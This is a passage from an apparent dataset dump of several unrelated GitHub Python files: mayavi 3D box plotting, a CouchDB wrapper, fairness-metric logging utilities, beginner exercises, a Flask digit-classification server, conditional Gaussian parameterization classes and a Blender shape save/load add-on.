  for k in range(0, 4):\n            i, j = k, (k + 1) % 4\n            mlab.plot3d([b[i, 0], b[j, 0]], [b[i, 1], b[j, 1]], [b[i, 2], b[j, 2]], color=color, tube_radius=tube_radius,\n                        line_width=line_width, figure=fig)\n\n            i, j = k + 4, (k + 1) % 4 + 4\n            mlab.plot3d([b[i, 0], b[j, 0]], [b[i, 1], b[j, 1]], [b[i, 2], b[j, 2]], color=color, tube_radius=tube_radius,\n                        line_width=line_width, figure=fig)\n\n            i, j = k, k + 4\n            mlab.plot3d([b[i, 0], b[j, 0]], [b[i, 1], b[j, 1]], [b[i, 2], b[j, 2]], color=color, tube_radius=tube_radius,\n                        line_width=line_width, figure=fig)\n\n        i, j = 0, 5\n        mlab.plot3d([b[i, 0], b[j, 0]], [b[i, 1], b[j, 1]], [b[i, 2], b[j, 2]], color=color, tube_radius=tube_radius,\n                    line_width=line_width, figure=fig)\n        i, j = 1, 4\n        mlab.plot3d([b[i, 0], b[j, 0]], [b[i, 1], b[j, 1]], [b[i, 2], b[j, 2]], color=color, tube_radius=tube_radius,\n                    line_width=line_width, figure=fig)\n\n    return fig\n\nref_3d=torch.tensor([[\n    [ 8.9112e+00, -2.0012e+00, -1.6553e+00],\n    [ 8.9581e+00, -3.7104e+00, -1.6553e+00],\n    [ 4.5004e+00, -3.8325e+00, -1.6553e+00],\n    [ 4.4536e+00, -2.1233e+00, -1.6553e+00],\n    [ 8.9112e+00, -2.0012e+00, -9.2259e-02],\n    [ 8.9581e+00, -3.7104e+00, -9.2259e-02],\n    [ 4.5004e+00, -3.8325e+00, -9.2259e-02],\n    [ 4.4536e+00, -2.1233e+00, -9.2259e-02]],\n\n    [[19.81525572,5.33127839,-1.95964969],\n    [19.83589252,6.99598226,-1.95812453],\n    [23.66489796,6.94881179,-1.95173037],\n    [23.64426116,5.28410792,-1.95325554],\n    [19.81284305,5.32999331,-0.52435224],\n    [19.83347984,6.99469718,-0.52282708],\n    [23.66248529,6.94752671,-0.51643292],\n    [23.641848,5.28282284,-0.51795809]]]\n)\nref_corners3d=ref_3d.numpy()\n\nlabels=torch.tensor([1,1])\nref_labels=labels.numpy()\n\nscores=torch.tensor([0.9942,0.9981])\nref_scores=scores.numpy()\nfig = visualize_pts()\nfig = draw_multi_grid_range(fig, bv_range=(0, -40, 80, 40))\n\nfor k in range(ref_labels.min(), ref_labels.max() + 1):\n    cur_color = tuple(box_colormap[k % len(box_colormap)])\n    mask = (ref_labels == k)\n    fig = draw_corners3d(ref_corners3d[mask], fig=fig, color=cur_color, cls=ref_scores[mask], max_num=100)\n\nmlab.show(stop=True)","repo_name":"qingping08/lidar-velodyne-detect","sub_path":"draw_scene_test.py","file_name":"draw_scene_test.py","file_ext":"py","file_size_in_byte":5399,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"33024442334","text":"import couchdb\nimport dotenv\nimport os\nimport re\nfrom logger import logger\n\ndotenv.load_dotenv()\n\nCOUCHDB_HOST = os.environ['COUCHDB_HOST']\nCOUCHDB_PORT = os.environ['COUCHDB_PORT']\nCOUCHDB_USERNAME = os.environ['COUCHDB_USERNAME']\nCOUCHDB_PASSWORD = 
os.environ['COUCHDB_PASSWORD']\n\nclass CouchDB:\n    def __init__(self, dbname, host=COUCHDB_HOST, port=COUCHDB_PORT,\n                 username=COUCHDB_USERNAME, password=COUCHDB_PASSWORD):\n        self.host = host\n        self.port = port\n        self.username = username\n        self.password = password\n\n        self.instance_url = f\"http://{self.username}:{self.password}@{self.host}:{self.port}\"\n        self.server = couchdb.Server(self.instance_url)\n        self.db = self.get_or_create_database(dbname)\n\n    def __repr__(self):\n        return f\"{self.server} - {self.db}\"\n\n    def get_or_create_database(self, dbname):\n        try:\n            db = self.server.create(dbname)\n            logger.info(f\"Database '{dbname}' created successfully.\")\n            return db\n        except couchdb.http.PreconditionFailed:\n            logger.info(f\"Database '{dbname}' already exists.\")\n            return self.server[dbname]\n\n    def upload_document(self, data, verbose=False, check=False):\n        doc_id = data.get('_id')\n        \n        if check:\n            # Check if the document with the specified ID exists\n            existing_doc = self.get_document(doc_id)\n            if existing_doc:\n                # Get the current revision of the existing document\n                data['_rev'] = existing_doc['_rev']\n\n        # Save the new or updated document\n        doc_id, doc_rev = self.db.save(data)\n        \n        if verbose:\n            logger.info(f\"Document uploaded with ID: {doc_id}\")\n        \n        return doc_id\n    \n    def upload_bulk_documents(self, data_list, verbose=False):\n        # Get the current revision of the existing documents\n        # for data in data_list:\n        #     doc_id = data.get('_id')\n        #     existing_doc = self.get_document(doc_id)\n        #     if existing_doc:\n        #         data['_rev'] = existing_doc['_rev']\n        \n        results = self.db.update(data_list)\n        if verbose:\n            logger.info(f\"{len(data_list)} documents uploaded in bulk.\")\n        return results\n\n    def get_document(self, doc_id):\n        try:\n            doc = self.db[doc_id]\n            return doc\n        except couchdb.http.ResourceNotFound:\n            logger.info(f\"Document with ID '{doc_id}' not found.\")\n            return None\n\n    def delete_document(self, doc_id):\n        try:\n            doc = self.db[doc_id]\n            self.db.delete(doc)\n            logger.info(f\"Document with ID '{doc_id}' deleted successfully.\")\n        except couchdb.http.ResourceNotFound:\n            logger.info(f\"Document with ID '{doc_id}' not found.\")\n\n    def update_document(self, doc_id, updated_data):\n        doc = self.get_document(doc_id)\n        if doc:\n            doc.update(updated_data)\n            self.db.save(doc)\n            logger.info(f\"Document with ID '{doc_id}' updated successfully.\")\n        else:\n            logger.info(f\"Document with ID '{doc_id}' not found.\")\n\n    def list_documents(self, limit=1):\n        try:\n            result = self.db.view(\"_all_docs\", descending=True, limit=limit)\n            latest_doc_id = result.rows[0].id\n            latest_doc = self.get_document(latest_doc_id)\n            return [latest_doc] if latest_doc else []\n        except couchdb.http.ResourceNotFound:\n            logger.info(\"No documents found.\")\n            return []\n    \n    def get_document_by_id(self, doc_id):\n        doc = self.get_document(doc_id)\n        if doc:\n            return dict(doc)\n        else:\n            return None\n\n    def extract_and_get_data(self, response):\n        match = re.search(r\"'tid':\\s*(\\d+)\", response)\n        return match.group(1)\n\n    def get_last_tid(self):\n        response = str(self.list_documents()[0])\n        logger.info(response)\n        return self.extract_and_get_data(response)\n\n","repo_name":"rNLKJA/Unimelb-Master-2023-COMP90024-Assignment-2","sub_path":"1_Flask_Backend/harvester/mastodon/database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":4071,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"15088498651","text":"import numpy as np\nimport 
torch\nfrom sklearn.metrics import f1_score, roc_auc_score\n\nimport copy\n\nclass AverageVarMeter(object):\n def __init__(self):\n self.reset()\n def reset(self):\n self.val=0\n self.sum2 = 0\n self.avg=0\n self.sum=0\n self.count=0\n\n def update(self,val,n=1):\n self.val = val\n self.sum2 += (val**2)*n\n self.sum +=val*n\n self.count +=n\n self.avg = self.sum / self.count\nclass LogsAVG:\n def __init__(self, logs_list):\n self.logs_list = logs_list\n self.train = {}\n self.test = {}\n self.res_cat = logs_list[0].res_cat\n self.crit_list = logs_list[0].crit_list\n\n self.initialize() \n self._get_average()\n self._obtain_worst_perf('train')\n self._obtain_worst_perf('test')\n\n \n def initialize(self,crit_list=None):\n if crit_list is None:\n crit_list = self.crit_list\n \n for cat in self.res_cat:\n self.train[cat] = {}\n self.test[cat] = {}\n for cl in crit_list:\n self.train[cat][cl] = []\n self.test[cat][cl] = []\n\n def _get_average(self): \n for cat in self.res_cat:\n for cl in self.crit_list:\n for lgc in self.logs_list:\n self.train[cat][cl].append(torch.tensor(lgc.train[cat][cl]).flatten())\n self.test[cat][cl].append(torch.tensor(lgc.test[cat][cl]).flatten())\n# print(torch.stack(self.train[cat][cl],dim=0))\n self.train[cat][cl] = torch.mean(torch.stack(self.train[cat][cl],dim=0), dim=0)\n self.test[cat][cl] = torch.mean(torch.stack(self.test[cat][cl],dim=0), dim=0)\n \n \n def _obtain_worst_perf(self, mode = 'train', return_val = False):\n if mode == 'train':\n logs = self.train\n elif mode == 'test':\n logs = self.test\n else:\n print(\"not implementation error\")\n \n logs['w'] = {}\n res_keys = list(logs['all'].keys())\n num_data = len(logs['all'][res_keys[0]])\n \n for cl in res_keys:\n logs['g0'][cl] = torch.tensor(logs['g0'][cl])\n logs['g1'][cl] = torch.tensor(logs['g1'][cl])\n if cl == 'loss':\n logs['w'][cl] = torch.max(logs['g0'][cl],logs['g1'][cl])\n else:\n logs['w'][cl] = torch.min(logs['g0'][cl],logs['g1'][cl])\n if return_val:\n return logs['w']\n else:\n return\n \nclass LogsCLS:\n def __init__(self,res_cat = ['all','g0','g1'],\n crit_list = ['acc','loss','weighted','micro','macro','roc_auc']):\n self.crit_list = crit_list\n self.res_cat = res_cat\n self.train = {}\n self.test = {}\n self.initialize()\n \n def initialize(self,crit_list=None):\n if crit_list is None:\n crit_list = self.crit_list\n \n for cat in self.res_cat:\n self.train[cat] = {}\n self.test[cat] = {}\n for cl in crit_list:\n self.train[cat][cl] = []\n self.test[cat][cl] = []\n \n def append_result(self, res_dic_list, mode = 'train'):\n if mode == 'train':\n logs = self.train\n elif mode == 'test':\n logs = self.test\n else:\n print(\"not implementation error\")\n \n for it,res_dic in enumerate(res_dic_list): \n for rk in res_dic.keys():\n logs[self.res_cat[it]][rk].append(res_dic[rk])\n \n def obtain_worst_perf(self, mode = 'train'):\n if mode == 'train':\n logs = self.train\n elif mode == 'test':\n logs = self.test\n else:\n print(\"not implementation error\")\n \n logs['w'] = {}\n res_keys = list(logs['all'].keys())\n num_data = len(logs['all'][res_keys[0]])\n \n for cl in res_keys:\n logs['g0'][cl] = torch.tensor(logs['g0'][cl])\n logs['g1'][cl] = torch.tensor(logs['g1'][cl])\n if cl == 'loss':\n logs['w'][cl] = torch.maximum(logs['g0'][cl],logs['g1'][cl])\n else:\n logs['w'][cl] = torch.minimum(logs['g0'][cl],logs['g1'][cl])\n return logs['w']\n\n \n \ndef binary_scores(output, target, prob=True, thres = 0.5):\n score_dic = {}\n if prob:\n pred = torch.tensor(output>thres, 
dtype=torch.float32)\n else:\n pred = output\n score_dic['weighted'] = f1_score(target, pred, average='weighted')*100\n score_dic['macro'] = f1_score(target, pred, average='macro')*100\n score_dic['micro'] = f1_score(target, pred, average='micro')*100\n score_dic['accuracy'] = accuracy_b(pred, target).item()\n score_dic['roc_auc'] = roc_auc_score(target,output)*100\n \n print('weighted: ', score_dic['weighted'])\n print('macro: ',score_dic['macro'])\n print('micro: ',score_dic['micro']) \n print('accuracy: ', score_dic['accuracy']) \n if prob:\n print(\"roc auc: \", score_dic['roc_auc'])\n return score_dic\n \ndef accuracy(output, target, topk=(1,)):\n '''Compute the top1 and top k error'''\n maxk = max(topk)\n batch_size = target.size(0)\n _,pred = output.topk(maxk,1,True,True)\n pred = pred.t()\n correct = pred.eq(target.view(1, -1).expand_as(pred))\n\n res = []\n for k in topk:\n correct_k = correct[:k].view(-1).float().sum(0)\n res.append(correct_k.mul(100.0 / batch_size))\n return res\n\ndef accuracy_b(output, target, thr = 0.5):\n '''Compute the top1 and top k error'''\n \n batch_size = target.size(0)\n pred = torch.tensor(output>thr,dtype = torch.float32)\n pred = pred.t()\n correct = pred.eq(target.view(1, -1).expand_as(pred))\n\n \n correct_k = correct.view(-1).float().sum(0)\n res=correct_k.mul(100.0 / batch_size)\n \n return res","repo_name":"psr6275/fairness_AL","sub_path":"codes/utils/eval_utils.py","file_name":"eval_utils.py","file_ext":"py","file_size_in_byte":6020,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"74921037227","text":"import os\n\nif os.name == \"posix\":\n os.system(\"clear\")\nelse:\n os.system(\"cls\")\n\n\n# Question 3 on Multiple List Comprehension\n\n# Use list comprehension to make a list that has the entries as all\n# possible sums of the elements in the lists [3, 5, 6] and [10, 13, 27],\n# i.e. 
[13, 16, 30, 15, 18, 32, 16, 19, 33]\n\ndef sumList(list1, list2):\n\n result = []\n\n for i in list1:\n for j in list2:\n result.append(i + j)\n\n return result\n\n# result = [n for n in range(0, 16) if (n**2 - 2*n + 1) % 3 == 0]\n\n\na = [3, 5, 6]\nb = [10, 13, 27]\n\nresult = [x + y for x in a for y in b]\n\nprint(result)\nassert result == [13, 16, 30, 15, 18, 32, 16, 19, 33]\n","repo_name":"Omortis/hw502","sub_path":"lec7-live/ex3.py","file_name":"ex3.py","file_ext":"py","file_size_in_byte":667,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"74227729068","text":"# WRITE YOUR SOLUTION HERE:\ndef most_common_words(filename: str, lower_limit: int):\n helper = {}\n helper2 = []\n with open(filename) as file:\n for line in file:\n helper2.append(line.strip().split(\" \"))\n for list in helper2:\n for item in list:\n if(\".\" in item or \",\" in item):\n item = item[:-1]\n if item not in helper:\n helper[item] = 1\n else:\n helper[item] += 1\n return {word: amount for word, amount in helper.items() if amount >= lower_limit}\n\n## Example solution\nfrom string import punctuation\n \ndef most_common_words(filename: str, lower_limit: int):\n with open(filename) as f:\n content = f.read()\n \n # remove line breaks and punctuation\n content = content.replace(\"\\n\", \" \")\n for punctuation_mark in punctuation:\n content = content.replace(punctuation_mark, \"\")\n \n words = content.split(\" \")\n return {word: words.count(word) for word in words if words.count(word) >= lower_limit}","repo_name":"paavkar/Python-Programming-MOOC-2023","sub_path":"Part 11/part11-12_most_common_words/src/most_common_words.py","file_name":"most_common_words.py","file_ext":"py","file_size_in_byte":1057,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"32959723626","text":"# enter ```ssh -R 80:localhost:3000 ssh.localhost.run``` to make local host publically exposed, but\n# beware: this isn't a secure connection \n \nfrom flask import Flask, request\nimport os\n\nimport numpy as np\nimport cv2\nimport tensorflow as tf\n\nimg_base_path = \"./server-received-capture\"\n\nimg_processed_base_path = './processed-picture'\nimg_processed_path = img_processed_base_path + \".jpg\"\n\n# functions\ndef processImg(img_path):\n\t# dimensions to shrink RPI picture to\n\tsize = (28, 28)\n\n\tgray = cv2.imread(img_path, cv2.IMREAD_GRAYSCALE)\n\t#cv2.imshow('gray', gray)\n\t#cv2.waitKey(0)\n\n\t#thresh = 127\n\tthresh = 70\n\tbw = cv2.threshold(gray, thresh, 255, cv2.THRESH_BINARY)[1]\n\n#\tcv2.imshow('bw', bw)\n#\tcv2.waitKey(0)\n\n\tsmoll_bw = cv2.resize(255-bw, size)\n#\tcv2.imshow('smoll bw', smoll_bw)\n#\tcv2.waitKey(0)\n\n\tcv2.destroyAllWindows()\n\n\tsmoll_bw = smoll_bw.flatten() / 255.0\n\treturn smoll_bw\n\n\napp = Flask(__name__)\n\n\n@app.route('/', methods = ['GET', 'POST'])\ndef index():\n\tif request.method == 'GET':\n\t\treturn \"Hello World!\"\n\tif request.method == 'POST':\n\t\tprint(\"processing...\")\n\t\tprediction = ''\n\t\t#print(request.data)\n\n\t\timg_path = img_base_path + \".jpg\"\n\t\timg_fd = os.open(img_path, os.O_WRONLY | os.O_CREAT)\n\t\tos.write(img_fd, (request.data)) \n\t\tos.close(img_fd)\n\n\t\twith tf.Session() as sess:\n\t\t\tnew_saver = tf.train.import_meta_graph('./tensorflow-demo/my_test_model-1000.meta')\n\t\t\tnew_saver.restore(sess, tf.train.latest_checkpoint('./tensorflow-demo/'))\n\n\t\t\tgraph = tf.get_default_graph()\n\t\t\tX = 
graph.get_tensor_by_name(\"X:0\")\n\t\t\tY = graph.get_tensor_by_name(\"Y:0\")\n\n\t\t\t# manipulate single image\n\t\t\timg = processImg(img_path)\n\n\t\t\top_to_restore = graph.get_tensor_by_name(\"output:0\")\n\n\t\t\t# generate prediction on single image\n\t\t\tprediction = sess.run(tf.argmax(op_to_restore, 1), feed_dict={X: [img]})\n\t\t\tprediction = str( np.squeeze(prediction) )\n\t\t\tprint(\"Prediction for test image:\", prediction)\n\t\t\treturn prediction\n\napp.run(port=3000)\n","repo_name":"michaelhtleung/handwritten-number-classifier","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1944,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"39517653017","text":"import numpy as np\nimport scipy\nimport scipy.linalg\nimport scipy.stats\n\n\nclass MeanConditionalNormal:\n\n def __init__(self, mua, cova, linear, bias, covcond):\n self.mua = mua\n self.cova = cova\n self.linear = linear\n self.bias = bias\n self.covcond = covcond\n\n def to_natural(self):\n # exactly the same formulas as natural to mean\n # those parametrizations are symmetric\n preca = np.linalg.inv(self.cova)\n preccond = np.linalg.inv(self.covcond)\n etaa = preca @ self.mua\n linear = preccond @ self.linear\n bias = preccond @ self.bias\n return NaturalConditionalNormal(etaa, preca, linear, bias, preccond)\n\n def to_joint(self):\n mub = np.dot(self.linear, self.mua) + self.bias\n mean = np.concatenate([self.mua, mub], axis=0)\n\n d = self.mua.shape[0]\n crosscov = np.dot(self.cova, self.linear.T)\n cov = np.zeros([2 * d, 2 * d])\n cov[:d, :d] = self.cova\n cov[:d, d:] = crosscov\n cov[d:, :d] = crosscov.T\n cov[d:, d:] = self.covcond + np.linalg.multi_dot([\n self.linear, self.cova, self.linear.T])\n\n return MeanJointNormal(mean, cov)\n\n def sample(self, n):\n aa = np.random.multivariate_normal(self.mua, self.cova, size=n)\n bb = np.dot(aa, self.linear.T) \\\n + np.random.multivariate_normal(self.bias, self.covcond, size=n)\n return aa, bb\n\n\nclass MeanJointNormal:\n\n def __init__(self, mean, cov):\n self.mean = mean\n self.cov = cov\n\n def to_natural(self):\n precision = np.linalg.inv(self.cov)\n return NaturalJointNormal(precision @ self.mean, precision)\n\n def to_conditional(self):\n d = self.mean.shape[0] // 2\n\n # parameters of marginal on A\n mua = self.mean[:d]\n cova = self.cov[:d, :d]\n preca = np.linalg.inv(cova)\n\n # intermediate values required for calculus\n mub = self.mean[d:]\n covb = self.cov[d:, d:]\n crosscov = self.cov[:d, d:]\n\n # parameters of conditional\n linear = np.dot(crosscov.T, preca)\n bias = mub - np.dot(linear, mua)\n covcond = covb - np.linalg.multi_dot([linear, cova, linear.T])\n\n return MeanConditionalNormal(mua, cova, linear, bias, covcond)\n\n def sample(self, n):\n return np.random.multivariate_normal(self.mean, self.cov, size=n)\n\n def encode(self, encoder):\n mu = np.dot(encoder, self.mean)\n cov = np.linalg.multi_dot([encoder, self.cov, encoder.T])\n return MeanJointNormal(mu, cov)\n\n\nclass NaturalJointNormal:\n\n def __init__(self, eta, precision):\n self.eta = eta\n self.precision = precision\n\n def to_mean(self):\n cov = np.linalg.inv(self.precision)\n return MeanJointNormal(cov @ self.eta, cov)\n\n def to_cholesky(self):\n L = np.linalg.cholesky(self.precision)\n zeta = scipy.linalg.solve_triangular(L, self.eta, lower=True)\n return CholeskyJointNormal(zeta, L)\n\n def to_conditional(self):\n d = self.eta.shape[0] // 2\n # conditional parameters\n preccond = 
self.precision[d:, d:]\n linear = - self.precision[d:, :d]\n bias = self.eta[d:]\n\n # marginal parameters\n tmp = linear.T @ np.linalg.inv(preccond)\n preca = self.precision[:d, :d] - tmp @ linear\n etaa = self.eta[:d] + tmp @ bias\n return NaturalConditionalNormal(etaa, preca, linear, bias, preccond)\n\n def reverse(self):\n d = self.eta.shape[0] // 2\n eta = np.roll(self.eta, d)\n precision = np.roll(self.precision, shift=[d, d], axis=[0, 1])\n return NaturalJointNormal(eta, precision)\n\n @property\n def logpartition(self):\n s, logdet = np.linalg.slogdet(self.precision)\n assert s == 1\n return self.eta.T @ np.linalg.solve(self.precision, self.eta) - logdet\n\n def negativeloglikelihood(self, x):\n \"\"\"Return the NLL of each point in x.\n x is a n*2dim array where each row is a datapoint.\n \"\"\"\n linearterm = -x @ self.eta - np.sum((x @ self.precision) * x, axis=1)\n return linearterm + self.logpartition\n\n def distance(self, other):\n return np.sqrt(\n np.sum((self.eta - other.eta) ** 2)\n + np.sum((self.precision - other.precision) ** 2)\n )\n\n\nclass CholeskyJointNormal:\n\n def __init__(self, zeta, L):\n self.zeta = zeta\n self.L = L\n\n def to_natural(self):\n return NaturalJointNormal(\n eta=self.L @ self.zeta,\n precision=self.L @ self.L.T\n )\n\n def kullback_leibler(self, other):\n V = scipy.linalg.solve_triangular(self.L, other.L).T\n return (.5 * np.sum((V @ self.zeta - other.zeta) ** 2)\n + .5 * np.sum(V ** 2) - np.sum(np.log(np.diag(V))))\n\n\nclass NaturalConditionalNormal:\n \"\"\"Joint Gaussian distribution between a cause variable A and an effect variable B.\n\n B is a linear encoder of A plus gaussian noise.\n The relevant parameters to describe the joint distribution are the parameters of A,\n and the parameters of B given A.\n \"\"\"\n\n def __init__(self, etaa, preca, linear, bias, preccond):\n # marginal\n self.etaa = etaa\n self.preca = preca\n # conditional\n self.linear = linear\n self.bias = bias\n self.preccond = preccond\n\n def to_joint(self):\n tmp = np.linalg.solve(self.preccond, self.linear).T\n eta = np.concatenate([self.etaa - tmp @ self.bias, self.bias], axis=0)\n\n d = self.etaa.shape[0]\n precision = np.zeros([2 * d, 2 * d])\n precision[:d, :d] = self.preca + tmp @ self.linear\n precision[:d, d:] = - self.linear.T\n precision[d:, :d] = - self.linear\n precision[d:, d:] = self.preccond\n return NaturalJointNormal(eta, precision)\n\n def to_mean(self):\n cova = np.linalg.inv(self.preca)\n covcond = np.linalg.inv(self.preccond)\n mua = cova @ self.etaa\n linear = covcond @ self.linear\n bias = covcond @ self.bias\n return MeanConditionalNormal(mua, cova, linear, bias, covcond)\n\n def to_cholesky(self):\n la = np.linalg.cholesky(self.preca)\n lcond = np.linalg.cholesky(self.preccond)\n return CholeskyConditionalNormal(\n za=scipy.linalg.solve_triangular(la, self.etaa, lower=True),\n la=la,\n linear=scipy.linalg.solve_triangular(lcond, self.linear, lower=True),\n bias=scipy.linalg.solve_triangular(lcond, self.bias, lower=True),\n lcond=lcond\n )\n\n def intervention(self, on, interpolation):\n \"\"\"Sample natural parameters of a marginal distribution\n Substitute them in the cause or effect marginals.\n \"\"\"\n dim = self.etaa.shape[0]\n prec = wishart(dim)\n eta = np.random.multivariate_normal(np.zeros(dim), prec / 2 / dim)\n if on == 'cause':\n eta = (1 - interpolation) * self.etaa + interpolation * eta\n prec = (1 - interpolation) * self.preca + interpolation * prec\n return NaturalConditionalNormal(eta, prec, self.linear, self.bias, 
self.preccond)\n elif on == 'effect':\n # linear = (1 - interpolation) * self.linear\n linear = 0 * self.linear\n rev = self.reverse()\n bias = (1 - interpolation) * rev.etaa + interpolation * eta\n prec = (1 - interpolation) * rev.preca + interpolation * prec\n return NaturalConditionalNormal(self.etaa, self.preca, linear, bias, prec)\n elif on == 'mechanism':\n linear = (self.preccond @ np.random.randn(dim, dim) / np.sqrt(dim) * .95)\n linear = (1 - interpolation) * self.linear + interpolation * linear\n bias = (1 - interpolation) * self.bias + interpolation * eta\n return NaturalConditionalNormal(self.etaa, self.preca, linear, bias, self.preccond)\n\n def reverse(self):\n \"\"\"Return the ConditionalGaussian from B to A.\"\"\"\n return self.to_joint().reverse().to_conditional()\n\n def distance(self, other):\n \"\"\"Return Euclidean distance between self and other in natural parameter space.\"\"\"\n return np.sqrt(\n np.sum((self.etaa - other.etaa) ** 2)\n + np.sum((self.preca - other.preca) ** 2)\n + np.sum((self.linear - other.linear) ** 2)\n + np.sum((self.bias - other.bias) ** 2)\n + np.sum((self.preccond - other.preccond) ** 2)\n )\n\n @property\n def logpartition(self):\n return self.to_joint().logpartition\n\n\nclass CholeskyConditionalNormal:\n\n def __init__(self, za, la, linear, bias, lcond):\n self.za = za\n self.la = la\n self.linear = linear\n self.bias = bias\n self.lcond = lcond\n\n def to_natural(self):\n return NaturalConditionalNormal(\n etaa=np.dot(self.la, self.za),\n preca=np.dot(self.la, self.la.T),\n linear=np.dot(self.lcond, self.linear),\n bias=np.dot(self.lcond, self.bias),\n preccond=np.dot(self.lcond, self.lcond.T)\n )\n\n def distance(self, other):\n return np.sqrt(\n np.sum((self.za - other.za) ** 2)\n + np.sum((self.la - other.la) ** 2)\n + np.sum((self.linear - other.linear) ** 2)\n + np.sum((self.bias - other.bias) ** 2)\n + np.sum((self.lcond - other.lcond) ** 2)\n )\n\n\n# _____ _\n# | __ \\ (_)\n# | |__) | __ _ ___ _ __ ___\n# | ___/ '__| |/ _ \\| '__/ __|\n# | | | | | | (_) | | \\__ \\\n# |_| |_| |_|\\___/|_| |___/\ndef wishart(dim, scale=1):\n ans = scipy.stats.wishart(df=2 * dim + 2, scale=np.eye(dim) / dim * scale).rvs()\n if dim == 1:\n ans = np.array([[ans]])\n return ans\n\n\ndef sample_natural(dim, mode='conjugate', scale=10):\n \"\"\"Sample natural parameters of a ConditionalGaussian of dimension dim.\"\"\"\n\n if mode == 'naive':\n # parameters of marginal on A\n etaa = np.random.randn(dim)\n preca = wishart(dim)\n\n # parameters of conditional\n linear = np.random.randn(dim, dim)/ np.sqrt(dim) * .95\n bias = np.random.randn(dim)\n preccond = wishart(dim, scale)\n\n elif mode == 'conjugate':\n n0 = 2 * dim + 2\n preca = wishart(dim)\n preccond = wishart(dim, scale)\n\n etaa = np.random.multivariate_normal(np.zeros(dim), preca / n0)\n bias = np.random.multivariate_normal(np.zeros(dim), preccond / n0)\n\n linear = preccond @ np.random.randn(dim, dim) / np.sqrt(dim) * .95\n\n return NaturalConditionalNormal(etaa, preca, linear, bias, preccond)\n\n\ndef sample_triangular(dim):\n t = np.tril(np.random.randn(dim, dim), -1)\n diag = np.sqrt(np.random.gamma(shape=2, scale=2, size=dim))\n return t + np.diag(diag)\n\n\ndef sample_cholesky(dim):\n \"\"\"Sample cholesky parameters of a ConditionalGaussian of dimension dim.\"\"\"\n # parameters of marginal on A\n zetaa = np.random.randn(dim)\n lowera = sample_triangular(dim)\n\n # parameters of conditional\n linear = np.random.randn(dim, dim)\n bias = np.random.randn(dim)\n lowercond = 
sample_triangular(dim)\n\n return CholeskyConditionalNormal(zetaa, lowera, linear, bias, lowercond)\n\n\ndef sample(dim, mode, **kwargs):\n if mode == 'natural':\n return sample_natural(dim, mode='conjugate', **kwargs)\n elif mode == 'naive':\n return sample_natural(dim, mode=mode, **kwargs)\n elif mode == 'cholesky':\n return sample_cholesky(dim).to_natural()\n","repo_name":"remilepriol/causal-adaptation-speed","sub_path":"normal_pkg/normal.py","file_name":"normal.py","file_ext":"py","file_size_in_byte":11541,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"37"} +{"seq_id":"3430522915","text":"import bpy\n\n\nclass SAVE_LOAD_SHAPES_OT_SaveShape(bpy.types.Operator):\n bl_idname = \"save_load_shapes.save_shape\"\n bl_label = \"Save Shape\"\n bl_description = \"Save Shape\"\n bl_options = {\"REGISTER\", \"UNDO\"}\n\n def execute(self, context):\n obj = bpy.context.active_object\n\n bpy.ops.object.mode_set(mode=\"OBJECT\")\n\n clone_obj = obj.copy()\n clone_obj.name = obj.name + \"_saved\"\n clone_obj.data = obj.data.copy()\n clone_obj.data.name = obj.data.name + \"_saved\"\n\n for item in obj.save_load_shapes.saved_shapes:\n if item.name == obj.save_load_shapes.save_name:\n item.obj = clone_obj\n bpy.ops.object.mode_set(mode=\"EDIT\")\n return {\"FINISHED\"}\n\n data = obj.save_load_shapes.saved_shapes.add()\n data.name = obj.save_load_shapes.save_name\n data.obj = clone_obj\n\n bpy.ops.object.mode_set(mode=\"EDIT\")\n\n return {\"FINISHED\"}\n\n\nclass SAVE_LOAD_SHAPES_OT_LoadShape(bpy.types.Operator):\n bl_idname = \"save_load_shapes.load_shape\"\n bl_label = \"Load Shape\"\n bl_description = \"Load Shape\"\n bl_options = {\"REGISTER\", \"UNDO\"}\n\n index: bpy.props.IntProperty(options={\"HIDDEN\"})\n\n def execute(self, context):\n obj = bpy.context.active_object\n\n bpy.ops.object.mode_set(mode=\"OBJECT\")\n\n clone_obj = obj.save_load_shapes.saved_shapes[self.index].obj\n\n if clone_obj is None:\n raise Exception(f\"No saved mesh {self.item_name} in {obj.name}\")\n\n if obj.type == \"MESH\":\n for v in obj.data.vertices:\n if v.select:\n v.co = clone_obj.data.vertices[v.index].co\n\n for group in obj.vertex_groups:\n clone_group = clone_obj.vertex_groups.get(group.name)\n if clone_group is None:\n continue\n for i in range(len(obj.data.vertices)):\n try:\n value = clone_group.weight(i)\n group.add([i], value, \"REPLACE\")\n except RuntimeError:\n group.remove([i])\n\n if obj.type == \"CURVE\":\n for spline_index, spline in enumerate(obj.data.splines):\n for bp_index, bp in enumerate(spline.bezier_points):\n copy_bp = clone_obj.data.splines[spline_index].bezier_points[\n bp_index\n ]\n bp.co = copy_bp.co\n bp.handle_left = copy_bp.handle_left\n bp.handle_right = copy_bp.handle_right\n for p_index, p in enumerate(spline.points):\n copy_p = clone_obj.data.splines[spline_index].points[p_index]\n p.co = copy_p.co\n\n bpy.ops.object.mode_set(mode=\"EDIT\")\n\n return {\"FINISHED\"}\n\n\nclass SAVE_LOAD_SHAPES_OT_DeleteShape(bpy.types.Operator):\n bl_idname = \"save_load_shapes.delete_shape\"\n bl_label = \"Delete Shape\"\n bl_description = \"Delete Shape\"\n bl_options = {\"REGISTER\", \"UNDO\"}\n\n def execute(self, context):\n obj = bpy.context.active_object\n\n i = 0\n while i < len(obj.save_load_shapes.saved_shapes):\n if (\n obj.save_load_shapes.saved_shapes[i].name\n == obj.save_load_shapes.delete_name\n ):\n obj.save_load_shapes.saved_shapes.remove(i)\n else:\n i += 1\n\n return {\"FINISHED\"}\n\n\nclass 
